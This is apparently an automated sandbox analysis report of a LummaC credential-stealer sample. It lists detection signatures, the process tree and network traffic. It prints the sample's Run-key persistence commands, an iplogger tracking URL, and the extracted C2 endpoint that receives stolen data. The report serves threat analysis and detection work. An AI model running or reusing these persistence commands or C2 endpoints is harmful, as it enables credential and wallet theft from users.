Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565453
MD5: eff5fbe427181fe1a3eed978cf0c9a36
SHA1: ddc48ac8b408c35b8bae9caf0b6c69df56a7c3e3
SHA256: 7119f52e94061723532085e4a082e0cb8bd3a6788b729fa41730571d77924c4d
Tags: exe, user-Bitsight

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
File is packed with WinRar
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EFF5FBE427181FE1A3EED978CF0C9A36)
    • cmd.exe (PID: 2708 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2084 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1732 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • dileapp.exe (PID: 3696 cmdline: C:\Users\Public\Netstat\dileapp.exe MD5: B0D5568D499D1DFA75064E85E9FB3EAC)
      • chrome.exe (PID: 2128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • dileapp.exe (PID: 7984 cmdline: "C:\Users\Public\Netstat\dileapp.exe" MD5: B0D5568D499D1DFA75064E85E9FB3EAC)
  • dileapp.exe (PID: 7568 cmdline: "C:\Users\Public\Netstat\dileapp.exe" MD5: B0D5568D499D1DFA75064E85E9FB3EAC)
  • dileapp.exe (PID: 5448 cmdline: "C:\Users\Public\Netstat\dileapp.exe" MD5: B0D5568D499D1DFA75064E85E9FB3EAC)
  • cleanup
{"C2 url": "https://water-acidict.cyou/api", "Build Version": "c2CoW0--bandl"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000F.00000003.1982904201.0000000000F67000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000F.00000003.2008902691.0000000000F58000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000F.00000003.1983969551.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

                System Summary

                Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Netstat\dileapp.exe, CommandLine: C:\Users\Public\Netstat\dileapp.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\dileapp.exe, NewProcessName: C:\Users\Public\Netstat\dileapp.exe, OriginalFileName: C:\Users\Public\Netstat\dileapp.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2708, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\dileapp.exe, ProcessId: 3696, ProcessName: dileapp.exe
                Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                Source: Network Connection, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 172.67.156.217, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\dileapp.exe, Initiated: true, ProcessId: 3696, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2708, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", ProcessId: 2084, ProcessName: reg.exe
                Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2708, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe", ProcessId: 2084, ProcessName: reg.exe
                Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\dileapp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1732, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Netstat

                AV Detection

                Source: C:\Users\Public\Netstat\dileapp.exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
                Source: dileapp.exe.7984.9.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": "https://water-acidict.cyou/api", "Build Version": "c2CoW0--bandl"}
                Source: file.exe, ReversingLabs: Detection: 28%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\Public\Netstat\dileapp.exe, Joe Sandbox ML: detected
                Source: file.exe, Joe Sandbox ML: detected
                Source: https://iplogger.co/1tJFB4, HTTP Parser: No favicon
                Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_0079A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0079A273
                Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_007AA537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007AA537

                Networking

                Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49763 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49751 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49763 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49751 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49750 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49764 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49747 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49766 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49756 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 172.67.156.217:443
                Source: Malware configuration extractor, URLs: https://water-acidict.cyou/api
                Source: Joe Sandbox View, IP Address: 239.255.255.250
                Source: Joe Sandbox View, IP Address: 104.21.82.93
                Source: Joe Sandbox View, IP Address: 172.67.167.249
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View, JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49768 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49760 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49764 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49770 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49776 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49762 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49774 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 172.67.156.217:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 172.67.156.217:443
                Source: unknown, TCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: global traffic
                HTTP traffic detected:
                    GET /1tJFB4 HTTP/1.1
                    Host: iplogger.co
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                Source: global traffic
                HTTP traffic detected:
                    GET /favicon.ico HTTP/1.1
                    Host: iplogger.co
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://iplogger.co/1tJFB4
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: 56396975137264100=3; clhf03028ja=8.46.123.228
                Source: global traffic
                HTTP traffic detected:
                    GET /favicon.ico HTTP/1.1
                    Host: iplogger.co
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: 56396975137264100=3; clhf03028ja=8.46.123.228
                Source: global traffic
                HTTP traffic detected:
                    GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=stBxbGhrHxDYMZ9&MD=gESBNraw HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                    Host: slscr.update.microsoft.com
                Source: global traffic
                HTTP traffic detected:
                    GET /rules/other-Win32-v19.bundle HTTP/1.1
                    Connection: Keep-Alive
                    Accept-Encoding: gzip
                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                    Host: otelrules.azureedge.net
                Source: global traffic
                HTTP traffic detected:
                    GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=stBxbGhrHxDYMZ9&MD=gESBNraw HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                    Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global traffic | DNS traffic detected: DNS query: iplogger.co
                Source: global traffic | DNS traffic detected: DNS query: water-acidict.cyou
                Source: global traffic | DNS traffic detected: DNS query: www.google.com
                Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: water-acidict.cyou
                Source: dileapp.exe, 0000000C.00000003.2050545971.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/api.default-release/key4.dbPK
                Source: dileapp.exe, 0000000C.00000003.2050545971.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/apiK
                Source: dileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/api_
                Source: dileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/apil
                Source: dileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/apitPK
